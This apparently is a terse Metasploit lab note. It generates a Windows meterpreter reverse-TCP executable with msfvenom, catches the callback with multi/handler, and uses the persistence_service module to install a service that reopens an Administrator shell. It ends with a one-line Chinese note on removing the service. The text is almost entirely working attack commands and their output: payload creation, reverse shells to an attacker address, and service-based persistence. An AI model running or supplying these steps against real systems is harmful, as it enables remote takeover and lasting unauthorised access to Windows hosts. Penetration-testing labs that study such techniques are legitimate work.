exploit/windows/local/persistence_service

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.18.13.90 lport=9999 -f exe > 123.exe

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 172.18.13.90
set lport 9999
exploit -j
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                 Connection
  --  ----  ----                     -----------                                 ----------
  1         meterpreter x64/windows  WIN-4G15PAGR5I1\Administrator @ WIN-4G15PA  172.18.13.90:9999 -> 172.18.13.145:57866 (
                                     GR5I1                                       172.18.13.145)
use exploit/windows/local/persistence_service
set session 1
run

[*] Started reverse TCP handler on 172.18.13.90:4444
[*] Running module against WIN-4G15PAGR5I1
[+] Meterpreter service exe written to C:\Users\ADMINI~1\AppData\Local\Temp\2\bknnobA.exe
[*] Creating service SsmCe
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/WIN-4G15PAGR5I1_20220722.4531/WIN-4G15PAGR5I1_20220722.4531.rc
[*] Sending stage (175174 bytes) to 172.18.13.145
[*] Meterpreter session 7 opened (172.18.13.90:4444 -> 172.18.13.145:61971) at 2022-07-22 14:45:33 +0800


卸载 服务：sc delete 【服务名称】